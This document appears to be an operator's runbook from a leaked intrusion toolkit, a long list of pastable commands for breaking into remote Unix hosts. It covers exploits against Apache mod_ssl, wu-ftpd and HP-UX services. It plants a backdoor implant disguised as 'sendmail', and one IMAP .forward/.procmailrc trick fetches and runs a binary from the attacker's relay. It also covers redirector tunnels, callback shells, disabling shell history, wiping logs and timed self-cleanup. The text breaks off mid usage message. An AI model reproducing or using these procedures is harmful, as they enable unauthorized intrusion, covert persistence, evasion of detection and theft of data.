#### PITCHIMPAIR-LINUX #### some.target.ip #### 1.2.3.4 #### /tmp/socket-root
#### CONNECT (or has scrubhands already done this for you?)
phone start
#### REDIAL (if using same ISP and still have floppy this is faster)
redial
#### TCPDUMP
cd /current/down
script -af tcpdump.raw
date; pwd; uname -a; ifconfig -a
tcpdump -ni ppp0
tcpdump -ni eth0
#### WORKING WINDOWS (also use "myenv" at any local prompt for pastables)
xterm &
cd /current/down
script -af script.$$
DISPLAY=:0.0 PS1="\t \h \w> " PATH=../bin:/current/bin:/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin
export DISPLAY PS1 PATH; date; pwd; uname -a; netstat -rn ; ifconfig -a
#### PITCHIMPAIR-LINUX #### some.target.ip #### 1.2.3.4 #### /tmp/socket-root
#### TOUCH (see also -nslookup -trace -ping and -icmptime from a NOPEN redirector)
nslookup some.target.ip
nslookup 1.2.3.4
nslookup -query=mx target.ip
nslookup -query=mx 1.2.3.4
ping -nc 5 1.2.3.4
traceroute 1.2.3.4
traceroute -n 1.2.3.4
# or with ICMP
traceroute -I 1.2.3.4
#### INC
#### See ourtn's many many options, to include new triggers
ourtn -h
ourtn -H
#### Get on up there
ourtn -ue 1.2.3.4
# if that one fails you have wrong ip maybe or try this
tn.spayed 1.2.3.4
#### INC TUNNEL (OLD WAY)
tunnel -localport 80 -tunnel FIRSTIP:port -target FIRSTIP -target SECONDIP
#### INC ONLY (no NOPEN)
ourtn 1.2.3.4
#### What to do?
w
# either make a working dir
mkdir /tmp/socket-root && cd /tmp/socket-root && chmod 0700 .
# or just use /tmp if deleting immediately...
cd /tmp && ls -arlt && pwd
~~p ../up/noserver sendmail
chmod 700 sendmail && netstat -an | grep 40019.*LISTEN || (PATH=. D="-l 40019" sendmail && rm sendmail) ; ls -arlt
# ps -- choose one or more
echo p | crash
ps -ef
ps -efwww
ps auxwww
# NOPEN for business... (should not need if using ourtn -ue, and
# also can be found via didthis if using ourtn)
cd /current/down
../bin/noclient 1.2.3.4:40019
#### JL without jackpop redirector
suntelnet.sh 1.2.3.4 LOCALIP 23064 /tmp/socket-root sendmail 13 40019
#### JL with -jackpop
# Don't forget: -jackpop does not like its old windows
# existing still on later tries.
-jackpop 1.2.3.4 13 REDIRECTIP 23064
###################################################### BEGIN -jackpop/nopen one-port
######
## NOTE: If problems (like lost connections) occur midstream with this method,
## look for our processes stranded on target (uudecode, sendmail,
## pt). If INCISION blessed, these will be hidden processes that will
## show up in a NOPEN =psdiff command as HIDDEN.
######
######
## JL via single available port (13 and 25 will both work) and
## run NOPEN session via that port too.
## Use this when JL trigger port is one and only port in or out.
######
######
## LOCALLY Start this in a scripted window.
## The local poptop will connect to 8080 down below.
######
myenv
noclient -l 8080
######
## LOCAL PREP (can do from any local dir--paste complete blocks)
## Some of these you will not use, FYI.
######
## Unalias cp since these prompt otherwise
unalias cp
## Make sure this is right noserver
packrat -l sendmail /current/up/noserver
## Equivalently, do this step by step if you want:
## cp /current/up/noserver /current/up/sendmail
## compress -c /current/up/sendmail > /current/up/sendmail.Z
## chmod 755 /current/up/noserver /current/up/sendmail*
## uuencode /current/up/sendmail.Z sendmail.Z > /current/up/sendmail.Z.uu
## pick right poptop
cp /current/up/poptop.i586-pc-linux-gnu /current/up/pt
sum -s /current/up/pt /current/up/sendmail
chown 0:0 /current/up/pt* /current/up/sendmail*
tar -C /current/up -cvf /current/up/u.tar sendmail pt
compress -c /current/up/u.tar > /current/up/u.tar.Z
uuencode /current/up/u.tar.Z u.tar.Z > /current/up/u.tar.Z.uu
ls -arlt /current/up | egrep "uu$|u.tar|sendmail| pt|poptop|noserver"
## Following should contain both sendmail and pt
tar tvzf /current/up/u.tar.Z
## Only need this if not using the "mostly automated" method below
gedit /current/up/u.tar.Z.uu&
## Probably don't need the rest unless target has no tar or uncompress:
uuencode /current/up/pt pt > /current/up/pt.uu
uuencode /current/up/sendmail sendmail > /current/up/sendmail.uu
uuencode /current/up/u.tar u.tar > /current/up/u.tar.uu
gedit /current/up/*.uu&
ls -arlt /current/up | egrep "uu$|u.tar|sendmail| pt|poptop|noserver"
######
-jackpop 1.2.3.4 13 REDIRECTIP 23064
## Option 3 run command on target.
## Choose offset if needed, and IN bless or not as desired.
3
############################################
###### EITHER CHOOSE THIS COMMAND
## Mostly automated method--only works if uudecode is on target.
## AND YOU DO NOT GET AN INTERACTIVE SHELL--until NOPEN is up and
## running, that is. (The environment syntax here will fail on csh
## or tcsh, e.g. with FreeBSD.)
##
## If this fails (due to missing uudecode, for example), you will
## be dropped into a shell, instead.
######
## IF this next line comes back with OOPS you are in an interactive shell and
## something failed with the command (wrong shell? uudecode/uncompress not there?)
##
## NON-ICESKATE METHOD (using poptop):
##
## stty -echo;mkdir -p /tmp/socket-root ; cd /tmp/socket-root;pwd;(R=1 export R;sleep 5;uudecode&&uncompress u.tar.Z&&tar xf u.tar&&PATH=. D=-l40019 sendmail&&rm -f sendmail u.tar&&PATH=. exec pt 40019)||(echo OOPS&&exec sh)
##
####
## MODIFIED SINCE NO POPTOP AVAILABLE IN OP
##
## stty -echo;mkdir -p /tmp/socket-root ; cd /tmp/socket-root;pwd;(R=1 export R;sleep 5;uudecode&&uncompress sendmail.Z&&PATH=. D=-l40019 ./sendmail&&rm -f sendmail)||(echo OOPS&&exec sh)
##
###### OR CHOOSE THIS COMMAND ###############
## More Manual method, gives interactive shell--WHOSE CONTENTS GO ACROSS IN THE CLEAR.
######
# Command to run (some prep, then exec shell):
cd /tmp ; ls -arlt ; mkdir -p /tmp/socket-root ; cd /tmp/socket-root ; ls -alrt ; pwd ; exec sh
##########################
######
## That pops up a window connecting to port 13
######
#################################### IF USING MOSTLY AUTOMATED CHOICE ABOVE
######
## REMOTE in popped up shell window
######
## If using port 25 as your JL port, you have to quit out of the SMTP
## negotiation before continuing.
quit
## This causes local spawn program to push up /current/up/u.tar.Z.uu if
## it exists, but it can also take an argument of what uuencoded/ascii
## file to push up with:
## --p (defaults to /current/up/u.tar.Z.uu )
## --p /current/up/someotherfile
##
## MODIFIED SINCE NO POPTOP AVAILABLE IN OP
##
## --p /current/up/sendmail.Z.uu
## Continue after seeing the traffic for the upload
## stop in the NOPEN/-jackpop window.
## This "--- " string causes the remote and local poptop programs to
## synch up to the waiting NOPEN server and client and should cause
## the NOPEN listener locally to start its connection to the target.
---
## Answer "A" to abort the autodone on the first NOPEN connection.
## Let autodone complete in one of your new windows you start up via
## the -tunnel command that follows after "END IF"
A
## Clean up (files should be gone already, might have working directory still)
-lt
-cd /tmp
-rm /tmp/socket-root
## The "sh -c stty -echo;..." process can and must be killed
ps -ef | grep stty
kill -9 THATPID
## After that, just "pt 40019" and "sendmail" processes remain
## and must stay until end of op
ps -ef
## Continue below after the "END IF" line similar to this "ELSE IF" one.
#################################### ELSE IF USING MANUAL CHOICE
################
#### WARNING:
#### This popped up shell window must be exited with "exit" and NOT ^D.
#### If you exit with ^D the sh and maybe other processes will be
#### stranded and not die cleanly.
################
######
## This is important: without it the paste to the uudecode fails, but
## otherwise it doesn't do much visibly.
######
stty -echo
# We use this shell to upload poptop and noserver.
# But first...(paste the whole bunch)
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
type perl uudecode uncompress tar
# if the type command fails try:
which perl uudecode uncompress tar
######
## no uudecode but we do have perl on target?
######
## LOCALLY run one of these (brings up new tab in gedit--use it)
## if uncompress on target
uudecode.pastable /current/up/u.tar.Z u.tar.Z
## if not
uudecode.pastable /current/up/u.tar u.tar
######
## LOCALLY select the gedit tab for what you want to
## paste up there (based on whether uncompress is there)
## Then middle-click paste it into target window.
######
######
## REMOTE--choose whatever makes sense--all should be safe
######
ls -arlt
uncompress *Z
for i in *tar ; do tar xvf $i ; done
ls -arlt
ls sendmail pt && rm u.tar*
######
## REMOTE -- Time to run NOPEN (and it inherits this session via pt)
######
# Start server listening and connect to it via poptop
# (you should see "tty should be setup...")
PATH=. D=-l40019 sendmail
PATH=. pt 40019
# Typing this next "--- " string activates poptop here and
# there to connect a local noclient to the remote noserver
# via this already established TCP session.
---
######
## FINI - clean up a bit
######
## Once NOPEN is up and running, both the previous hop's
## noclient window where -jackpop was run and the shell
## window it popped up will be tied up until we're done
## on the jackladder'd target.
######
-cd /tmp
-ls /tmp/socket-root
rm -rf /tmp/socket-root
#################################### END IF (CHOICE OF WHICH, MANUAL OR AUTO?)
# Op away....
# AUTODONE ?? Skip the autodone stuff in your first window on target,
# since that NOPEN session thinks the target's IP is 127.0.0.1.
# Instead, use the multiple window -tunnel trick below. In those
# new noclient windows on target, the correct target IP is used
# for all of the autodone stuff.
########################
## Need multiple NOPEN windows? This is the only way...
########################
######
## REMOTE start this tunnel
######
-tunnel l 40019 1.2.3.4 40019
######
## LOCALLY as many times as you need windows
######
noclient -c "-cd /tmp" 127.0.0.1:40019
###### Bailing
## First, -exit any NOPEN sessions you started via the -tunnel,
## close that tunnel and quit out of -tunnel.
##
## Burn the NOPEN server. Post -burn/BURN on the new nopen,
## the popped up window should exit on its own. Use the "DONE"
## in the -jackpop window then.
######
-burn
BURN
DONE
######################################################## END -jackpop/nopen one-port
#### JL with uploaded jackpop binary (way old way)
RA=REDIRECTIP RP=43122 \
TA=1.2.3.4 TP=13 \
sgitelnet.sh REDIRECTIP REDIRECTIP 23064 \
/tmp/socket-root sendmail 43122 40019
#### Upload jackpop before pasting command to redirector
~~p ../bin/jackpop jp
#### in NOPEN window on redirector you'll need
-rtun 23064
#### Now paste in the "chmod 700 && ....." command sgitelnet.sh gave you
#### CONNECT
#### PITCHIMPAIR-LINUX #### some.target.ip #### 1.2.3.4 #### /tmp/socket-root
../bin/noclient 1.2.3.4:40019
-nstun 1.2.3.4 40019
-rm sendmail
#### GOT ROOT?
-gs info
# AT JOB
cd /; echo "rm -rf /tmp/socket-root > /dev/null 2>&1" | at now + 180 minutes
at -l; date
mx
:%s/^at -r .*$/ at -r #### /g
`x
#### SURVEY
-gs survey
df -k
-find some.find
-lsh egrep '(tftpboot|cisco|router|hack|\.\.\.|tacac|ssh)' cmdout/some-find
-lsh egrep '(trip|twz|tw.config|aset)' cmdout/some-find
#### GO FREESTYLE
#### PITCHIMPAIR-LINUX #### some.target.ip #### 1.2.3.4 #### /tmp/socket-root
###
### BEGIN USER.MISSION File user.mission.generic.COMMON (see also ../etc/user.mission.generic.COMMON)
###
############- TOUCH #only from redirector **SKIP**
nslookup domain
nslookup ip
nslookup -query=mx domain_name
nslookup -query=mx domain_name
############- on solaris pingflag is -s
ping IP
TTL         OS
2 - 32      Windows for Workgroups
2 - 32      Windows 95
34 - 64     Red Hat Linux (< version 6.0)
34 - 64     Digital UNIX
34 - 64     SCO
98 - 128    Windows NT
98 - 128    Windows 95 w/MS Dialup Network Upgrade
98 - 128    Windows 98
225 - 255   UNIX
Note: recent Sun OS 5.9 boxes TTL 34-64.
################### PITCHIMPAIR INSTRUCTIONS ######################################
###
### begin user.mission.pitchimpair
###
### get rid of pesky spaces at beginning of lines (fixes pasted html)
:%s/^[ ]*//g
:1
### Set up variables. Use the next section for reference.
## Description      Typical Value   Actual Value This OP
## ---------------  -------------   --------------------
## local-ip:                        LOCAL_IP
## pitch-ip:                        PITCH_IP
## target-ip:                       TARGET_IP
## target-name:                     TARGET_NAME
## target-domain:                   TARGET_DOMAIN
## netcat-port:     random          NETCAT_PORT
## rat-port:        nopen port      RAT_PORT
## rat-name:        sendmail        RAT_NAME
## work-dir:        .scsi           WORK_DIR
# Make the changes here. Use the above for reference if you need it.
#######################################################################
#
# Need a new userlist ?
#
# -ls /global/m*/MB/*/*/*/mailinfo.dat > L:/current/down/userlist
#
# (N.B. the -ls will give the mailinfo.dat file timestamps in the
# format expected by lsstamp ... see next command)
#
# ## now, LOCALLY run lsstamp userlist > userlist.sorted
# ## (lsstamp will sort the -ls lines in date order)
#
# Collection: -get /global/m1/MB/96/8/karachi:moftec/mailinfo.dat
#
#######################################################################
mx
:%s/LOCAL_IP/LOCALIP/g
:%s/PITCH_IP/PITCH_IP/g
:%s/TARGET_IP/TARGET_IP/g
:%s/TARGET_NAME/TARGET_NAME/g
:%s/TARGET_DOMAIN/TARGET_DOMAIN/g
:%s/NETCAT_PORT/38745/g
:%s/RAT_PORT/RAT_PORT/g
:%s/RAT_NAME/sendmail/g
:%s/WORK_DIR/.scsi/g
:%s/mm-dd-yyyy/mm-dd-yyyy/g
`x
### Use this if we already own the target:
### Create /current/etc/hops.txt file
HOP1: PITCH_IP:R -lue
HOP2: TARGET_IP:R -uec
############ Set up nopen for access
###
### start upload in another window
cd /current/up
file noserver*
cp noserver.[sparc] noserver
### using NOPEN
file noserver*
packrat NETCAT_PORT
# cp noserver sendmail; compress -c sendmail | uuencode sendmail.Z > sendmail.uu
# ls -l sendmail.uu*
# nc -l -p NETCAT_PORT < sendmail.uu
### Filters out "last" command on initial ops on the target
echo "last" > /current/etc/autofilter.TARGET_NAME.TARGET_IP
# or
echo "last" > /current/etc/autofilter.TARGET_NAME.TARGET_DOMAIN.TARGET_IP
### in setting up windows, you probably want this
### td is an alias on HURRICANE and TYPHOON to set up a TCPDUMP xterm on right screen
td
cd /current/down
script -a windows.tcpdump
tcpdump -i eth0 -n -n
### in addition to this (which scrubhands may have given you)
td
cd /current/down
script -a tcpdump.raw
tcpdump -i ppp0 -n -n
### Use something similar to this for annoying packets in the red tcpdump:
### Paste in a non-scripted window:
echo "pathcost" >> /tmp/filters.inuse && mv /tmp/filters.inuse /tmp/filters
echo "NetBeui" >> /tmp/filters.inuse && mv /tmp/filters.inuse /tmp/filters
echo "who-has" >> /tmp/filters.inuse && mv /tmp/filters.inuse /tmp/filters
echo "router" >> /tmp/filters.inuse && mv /tmp/filters.inuse /tmp/filters
### if done via PITCHIMPAIR infrastructure:
###
### Get onto INCISION host:
###
# if using hops.txt:
ourtn
# if using commandline:
ourtn -uel PITCH_IP
# or
ourtn -ue PITCH_IP TARGET_IP
ourtn -eulc -o RAT_PORT PITCH_IP TARGET_IP
DISPLAY= export DISPLAY
./ftshell ./tn.spayed PITCH_IP
### or
./ftshell ourtn PITCH_IP
### Check for our PID (shouldn't see it)
ps -ef|grep
### See who's on
w ; date
### Check for anything mucking with /tmp
ps -ef | grep \/tmp
df -k
dmesg
### Create working directory - first make sure /tmp doesn't have it already
ls -al /tmp
cd /tmp; ls -al
pwd
### check things out a bit...
ls -lart /etc | tail -30 ; uname -a ; date ; ifconfig -a ; w
### maybe check logs?
ls -lart /var/adm /var/log
### look for sniffers etc
ps -ef|grep
####
### upload RAT
~~p ../up/noserver.sparc sendmail
ls -al
chmod 700 sendmail && netstat -an | grep RAT_PORT
PATH=. D="-l RAT_PORT" sendmail && rm sendmail && ls -alrt
### in a local window, connect to pitchimpair via nopen, and start tunnels
####
### Ex: noclient 217.53.1.2:39222
cd /current/down
noclient PITCH_IP:RAT_PORT
#-readrc ../etc/norc.solaris
########################################
# INCISION to FreeBSD implant
########################################
# from local LINUX scripted window
export EXPECT_PROMPT="(%|:|#|\\$)[ ]*$"
ourtn -lue PITCH_IP
-irtun 219.238.199.144 RANDOM_PORT -z -s 80
setenv D -lNOPEN_PORT          # NO = sign and use setenv
set path = (. /usr/bin /bin)   # NO QUOTES and use set
~~p /current/up/noserver cron  # freebsd noserver
which cron
cron
# from NOPEN on the PITCHIMPAIR host:
-nstun 219.238.199.144:NOPEN_PORT
-cd /tmp
-lt
-rm cron
-lt
-------------------------------------
export EXPECT_PROMPT="(%|:|#|\\$)[ ]*$"
ourtn -lz TARGET_IP
# or
-irtun TARGET_IP PORT -lz
setenv D -lNOPEN_PORT          # NO = sign and use setenv
set path = (. /usr/bin /bin)   # NO QUOTES and use set
~~p /current/up/noserver crond # freebsd noserver
which crond
crond
noclient TARGET_IP:NOPEN_PORT
# or
-nstun TARGET_IP NOPEN_PORT
########################################
# JACKLADDER
########################################
### can be done without a redirector and will upload and execute nopen
jacktelnet.sh TARGET_IP LOCAL_IP NETCAT_PORT WORK_DIR RAT_NAME [JACKPORT]
########################################
# JACKLADDER - triggering IN thru JACKPOP on Linux (FAINTSPIRIT)
########################################
### Local window, let this sit and wait:
ourtn -T 202.38.128.1 -n -I -ue -O 113 -p 443 -C 211.40.103.194 127.0.0.1
### on PITCH: set up window for nopen callback
-nrtun 113
### on PITCH: set up tunnel for nopen upload
-tunnel r NOPEN_UPLOAD_PORT
### on PITCH, run jackpop to tickle incision
-jackpop 202.38.128.1 110 211.40.103.194 13732
#3 run a command
/dev/ttyia2 PITCH_IP 443
yes
### let incision bless the commands
### incision will talk to your local window, then callback to your -nrtun window
###################################################
### REDIRECTING IN THRU WINDOWS
###################################################
################## SENDING TRIGGER THRU WINDOWS (2000 or XP) BOX ##########################
##### NT4.0 doesn't allow the use of raw sockets, which is needed to send the IN trigger
##
mx
:%s/LOCAL_WINDOWS_IP/LOCAL_WINDOWS_IP/g
:%s/LOCAL_UNIX_IP/LOCAL_UNIX_IP/g
:%s/UNIX_INCISION_TRIGGER_PORT/UNIX_INCISION_TRIGGER_PORT/g
:%s/INCISION_CALLBACK_PORT/INCISION_CALLBACK_PORT/g
:%s/NOPEN_CALLBACK_PORT/NOPEN_CALLBACK_PORT/g
:%s/WIN_TARG_INTERNAL_IP/10.140.0.9/g
:%s/TARGET_IP/10.140.0.40/g
`x
## Usage: script unixredirect.eps LOCAL-WINDOWS-IP LOCAL-UNIX-IP UNIX-INCISION-TRIGGER-PORT INCISION-CALLBACK-PORT NOPEN-CALLBACK-PORT
script unixredirect.eps LOCAL_WINDOWS_IP LOCAL_UNIX_IP UNIX_INCISION_TRIGGER_PORT INCISION_CALLBACK_PORT NOPEN_CALLBACK_PORT
### or run the following by hand
### On Windows box
#####################
# Note: can use 'background' instead of 'monitor' in the windows commands
# This sends the trigger:
# monitor packetredirect -packettype tcp -listenport LOCAL-PORT -bind LOCAL-WIN-IP
# Ex. - monitor packetredirect -packettype tcp -listenport 32654 -bind DOOBIEIP
monitor packetredirect -packettype tcp -listenport LOCAL_PORT -bind LOCAL_WIN_IP
# This listens for the ish callback
# monitor redirect -tcp -implantlisten ISH-CALLBACK-PORT -target LOCAL-LINUX-IP ISH-CALLBACK-PORT
# Ex. - monitor redirect -tcp -implantlisten 28345 -target FIREBALL_IP 28345
monitor redirect -tcp -implantlisten ISH_CALLBACK_PORT -target LOCAL_LINUX_IP ISH_CALLBACK_PORT
# For nopen connection:
# monitor redirect -tcp -lplisten RAT-PORT
# Ex. - monitor redirect -tcp -lplisten 47108
monitor redirect -tcp -lplisten RAT_PORT -target TARGET_IP RAT_PORT -bind LOCAL_WIN_IP
# For additional nopen connections, increment the lplisten port, but keep the same target nopen port:
# monitor redirect -tcp -lplisten RAT-PORT+1 -target TARGET-IP RAT-PORT -bind LOCAL-WIN-IP
# Ex. - monitor redirect -tcp -lplisten 47109 -target 10.1.1.3 47108 -bind 10.1.1.2
# Ex. - monitor redirect -tcp -lplisten 47110 -target 10.1.1.3 47108 -bind 10.1.1.2
monitor redirect -tcp -lplisten RAT_PORT+1 -target TARGET_IP RAT_PORT -bind LOCAL_WIN_IP
### On Linux box:
#####################
# Once the first three windows commands are set up, you can send the trigger:
# ourtn -W LOCAL-WIN-IP:LOCAL-PORT -o RAT-PORT -p ISH-CALLBACK-PORT -i WIN-TARG-IP -ue TARGET-IP
# Ex: ourtn -W DOOBIE_IP:32654 -o 47108 -p 28345 -i 10.1.1.4 -ue 10.1.1.3
#ourtn -W LOCAL_WIN_IP:LOCAL_PORT -o RAT_PORT -p ISH_CALLBACK_PORT -i WIN_TARG_IP -ue TARGET_IP
#ourtn -W 192.168.254.253:31413 -O 41611 -C 202.154.225.27 -p 37541 -i 202.154.225.27 -ue 10.140.0.40
#ourtn -ueW 192.168.254.253:31413 -i 202.154.225.27 -C 202.154.225.27 -p 37541 -O 41611 10.140.0.40
TRAVOLTA=1 ourtn -ueW 192.168.254.22:8942 -i 10.140.0.9 -C 10.140.0.9 -p 18855 -O 7549 10.140.0.40
### Use the TRAVOLTA option to keep nopen from dying in 5 hours, only if you think the op will be extended
### If alien has issues with an nfs mount point, use the "-Q" option to ourtn and DO NOT run the following:
### -lt /, df -k; otherwise you'll tie up your window and will need to kill the process.
### It's better NOT to run nopen built-ins on alien so that you can kill something if it hangs.
incision trigger  = UNIX_INCISION_TRIGGER_PORT
incision callback = INCISION_CALLBACK_PORT
nopen callback    = NOPEN_CALLBACK_PORT
#ourtn -ueW 192.168.254.142:36541 -i 10.140.0.9 -C 10.140.0.9 -p 34789 -O 45665 10.140.0.40
#ourtn -ueW LOCAL-WIN-IP:LOCAL-PORT -i WIN-TARG-IP -C WIN-TARG-INTERNAL-IP -p ISH-CALLBACK-PORT -O RAT-PORT TARGET-IP
ourtn -ueW LOCAL_WINDOWS_IP:UNIX_INCISION_TRIGGER_PORT -i WIN_TARG_INTERNAL_IP -C WIN_TARG_INTERNAL_IP -p INCISION_CALLBACK_PORT -O NOPEN_CALLBACK_PORT TARGET_IP
noclient -l NOPEN_CALLBACK_PORT
#noclient -l 45665
# Call forward to nopen works to alien, start a -listen PORT to call forward
# Set up redirectors on windows side to allow the following connections:
mx
:%s/NOPEN_CALLFORWARD_PORT/NOPEN_CALLFORWARD_PORT/g
`x
# on windows side:
background redirect -tcp -lplisten NOPEN_CALLFORWARD_PORT -target TARGET_IP NOPEN_CALLFORWARD_PORT -bind LOCAL_WINDOWS_IP
background redirect -tcp -lplisten NOPEN_CALLFORWARD_PORT+1 -target TARGET_IP NOPEN_CALLFORWARD_PORT -bind LOCAL_WINDOWS_IP
background redirect -tcp -lplisten NOPEN_CALLFORWARD_PORT+2 -target TARGET_IP NOPEN_CALLFORWARD_PORT -bind LOCAL_WINDOWS_IP
-listen NOPEN_CALLFORWARD_PORT
noclient LOCAL_WINDOWS_IP:NOPEN_CALLFORWARD_PORT
#noclient LOCAL_WINDOWS_IP:NOPEN_CALLFORWARD_PORT+1
#noclient LOCAL_WINDOWS_IP:NOPEN_CALLFORWARD_PORT+2
#### To kill one server first use it to start a new one (new one won't burn)
D=-l23477 PATH=. sendmail
-burn
BURN
# Connect to nopen; suggest using the port override option (-o) above for simplicity
# For additional windows, you and the windows person must increment the redirected port
# Ex. - noclient 10.1.1.2:47108
# Ex. - noclient 10.1.1.2:47109
#noclient 10.1.1.2:RAT_PORT+1
###########################################################
# YES - for HPUX
###########################################################
./yes 127.0.0.1 100083 1 PROGRAM_PORT 0x40062ea8 'mkdir /tmp/.scsi;cd /tmp/.scsi && /usr/bin/telnet PITCH_IP NETCAT_PORT &1 > /dev/null 2>&1 && uncompress -f sendmail.Z;chmod 0700 sendmail && export D=-cPITCH_IP:NOPEN_PORT && ./sendmail'
###########################################################
# CUP
###########################################################
-gs wearcup -h
### to have it cleanup in 3 hours:
-gs wearcup -r -w 3h
### to have it cleanup in 2 minutes:
-gs wearcup -r -w 120s
### or, run it by hand:
### locally, edit cup, and change the working dir, and time in minutes to wait for execution
### upload cup
-put /current/up/cup.DEPRECATED.SEE.README.cup.NOPEN cup
-cat cup
### run cup
./cup &
ps -ef |grep sleep
### You can kill the sleep to make it execute immediately, or just let
### it run normally
-exit
#### DO NOT -burn !!!!!!!!! USE -exit INSTEAD !!!!!!!!!!
###########################################################
# HP Kernel Checks
###########################################################
# run these to check target for kernel info for implants:
/usr/bin/getconf SC_CPU_VERSION
/usr/bin/getconf SC_KERNEL_BITS
kmadmin -s
#########################################################
# EVENLESSON
#########################################################
# runs against Linux systems running Apache with mod_ssl accessing
# OpenSSL 0.9.6d or earlier on x86 architectures
# May not work first time; Try increasing the number of connections to the target by 6.
# If this fails, try increasing the number of connections by 4 until you reach 40.
# Should give you prompt on system - may have to elevate
#-scan 443 TARGET_IP
-scan http TARGET_IP
-scan ssl TARGET_IP
### Redirector:
-tunnel
l 443 TARGET_IP
r NETCAT_PORT
### query target:
./apache-ssl-linux_v3 -i 127.0.0.1
./apache-ssl-linux -i -s
### Usage:
# Usage: ./apache-ssl-linux <-i hostname> [-s scan banner] [-t arch] [-p port] [-n ] [-a 0x ]
### Usage for default values:
./apache-ssl-linux -i TARGET_IP -t ARCH
### Usage for increasing number of connections to increase chances
./apache-ssl-linux -i TARGET_IP -t ARCH -n 20
#### get ptrace, forkpty, and nopen tarball ready to send:
cd /current/up
cp ptrace pt
cp noserver sendmail
cp forkpty fp
tar cvf 1u.tar pt sendmail fp
uuencode 1u.tar 1u.tar > 1u.tar.uu
nc -l -p NETCAT_PORT < 1u.tar.uu
#### to elevate and also get nopen there:
cd /tmp
mkdir .scsi
cd .scsi
telnet LOCAL_IP NETCAT_PORT > src
Connection closed by foreign host.
ls -la
uudecode src
ls -la
tar xvf 1u.tar
ls -la
chmod 700 fp sendmail pt
./fp
#### at sh-prompt, type:
tty
./pt
id
PATH=. sendmail
##### Cleanup /var/log/httpd/error_log
###########################################################
# EYEMASK
###########################################################
### Imap masquerade
### Bring a local to get root
### for solaris
nc -v -l -p 53 < ../up/noserver-sparc-sun-solaris2.5.1
noclient -l 25
telnet TARGET_IP 143
A000 LOGIN user password
A001 EXAMINE /etc/mail/sendmail.cf
A002 FETCH 1 RFC822
A003 EXAMINE /etc/passwd
A004 FETCH 1 RFC822
A003 EXAMINE /etc/shells
A004 FETCH 1 RFC822
A005 EXAMINE .forward
A006 CREATE .forward
A007 CREATE .forward
A008 APPEND .forward (\Seen) {145}
"| /bin/ksh -c '/bin/cat/tmp/sendmail;chmod +x /tmp/sendmail;D=-cPITCH_IP:25 PATH=/tmp sendmail;rm -f /tmp/sendmail'"
A009 DELETE .forward
A010 LOGOUT
telnet PITCH_IP 25
HELO helo
MAIL FROM: user@itt.beta.net
RCPT TO: user@itt.beta.net
DATA
.
QUIT
# echo -e "HTTP/1.0 200\n" > new
# cat new noserver-2.6.1-i586.pc.linux.gnu.redhat-5.0 > sendmail
# nc -v -l -p 53 < sendmail
# noclient -l 25
telnet TARGET_IP 143
A000 LOGIN user password
A001 EXAMINE /etc/mail/sendmail.cf
A002 FETCH 1 RFC822
A003 EXAMINE /etc/passwd
A004 FETCH 1 RFC822
A003 EXAMINE /etc/shells
A004 FETCH 1 RFC822
A100 LIST /etc/smrsh *
A005 EXAMINE .forward
A006 CREATE .forward
A007 CREATE .forward
A008 APPEND .forward (\Seen) {11}
"| slocal"
A100 CREATE .maildelivery
A101 APPEND .maildelivery (\Seen) {37}
To user pipe A >/home/user/.g
A102 LIST "" %
A102 RENAME .g .procmailrc
A008 APPEND .procmailrc (\Seen) {128}
:0 c
|cd /tmp;wget http://PITCH_IP:53/sendmail; chmod +x /tmp/sendmail;D=-cPITCH_IP:25 PATH=/tmp sendmail;rm -f sendmail
A009 DELETE .forward
A009 DELETE .maildelivery
A009 DELETE .procmailrc
A010 LOGOUT
telnet localhost 25
HELO helo
MAIL FROM: user@localhost.localdomain
RCPT TO: user@localhost.localdomain
DATA
.
QUIT
telnet fawn 143
A000 LOGIN user password
A001 EXAMINE /etc/mail/sendmail.cf
A002 FETCH 1 RFC822
A003 EXAMINE /etc/passwd
A004 FETCH 1 RFC822
A003 EXAMINE /etc/shells
A004 FETCH 1 RFC822
A102 LIST "/usr/bin/X11" %
A005 EXAMINE .forward
A006 CREATE .forward
A007 CREATE .forward
A008 APPEND .forward (\Seen) {50}
"| /usr/bin/*11/xterm -display PITCH_IP:26000"
A009 DELETE .forward
A010 LOGOUT
telnet fawn 25
HELO helo
MAIL FROM: user@fawn.beta.net
RCPT TO: user@fawn.beta.net
DATA
.
QUIT
### cleanup possible logging in /var/adm/messages (should blend in if it fails)
###########################################################
# EXPOUNDATOM
###########################################################
# Requires the target to have the wu-2.6.1 FTP service running
# Requires anonymous ftp access (determined if exploit works)
# -scan ftp TARGET_IP
# A maximum of two tries can be attempted.
#
# Syntax
# ./wu-261-linux -h
# For target list:
# ./wu-261-linux -t0 -h
# No redirection:
./wu-261-linux TARGET_IP 21 VERSION
# w/ redirection:
-tunnel
l 21 TARGET_IP
# Locally:
./wu-261-linux -a -d 127.0.0.1
./wu-261-linux -t17 -d 127.0.0.1
# Should give you root; need to upload nopen
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
which uudecode uncompress
# gedit sendmail
uudecode; ls -latr
uncompress sendmail.Z
ls -la
chmod 700 sendmail
PATH=. sendmail
# IF it complains about the user/pass correct, then it's not vulnerable to
# our pair that we try to send it;
# Cleanup:
# /var/log/messages (look for ftp access)
# /var/adm/utmpx, wtmpx
# /var/log/secure
###################################################
### EMBERSNOUT
###################################################
# must verify that box is RH9.0(SHRIKE) and that
# httpd is "Apache/2.0.40 (Red Hat Linux)"
-scan telnet TARGET_IP
-scan ssh TARGET_IP
-scan ssl TARGET_IP
# Notes:
# this indicates it's RH9.0 but could be either Psyche or Shrike:
# (Linux release 2.4.20-8custom #3 SMP Thu Aug 28 13:56:20 EDT 2003)
# seeing this indicates (Shrike) because the version is bundled with it:
# SH-1.99-OpenSSH_3.5p1
# this version of Apache is needed but Psyche comes with 2.0.40-8 and
# Shrike comes with 2.0.40-21; the release is not determinable from
# a scan; just verify it's what is expected:
# Server: Apache/2.0.40 (Red Hat Linux)
#
# op box should work - depends if python is included
rpm -qf /usr/bin/python
# should see: python-base-2.2-9mdk
# if you want it to pop an xterm back to your screen:
# - make sure 6000 is listening
# - run xhost +
./es.py
Arguments: ['./es.py']
Usage -> ./es.py ip port packet_size start_ebp end_ebp ebp_inc hex_pad_byte "cmd"
where...
ip............target IP address
port..........target httpd TCP port number (usually 443)
packet_size...attack packet length in bytes
start_ebp.....guessed %ebp value to start with
end_ebp.......guessed %ebp value to end with
ebp_inc.......how many stack bytes to bump %ebp each time
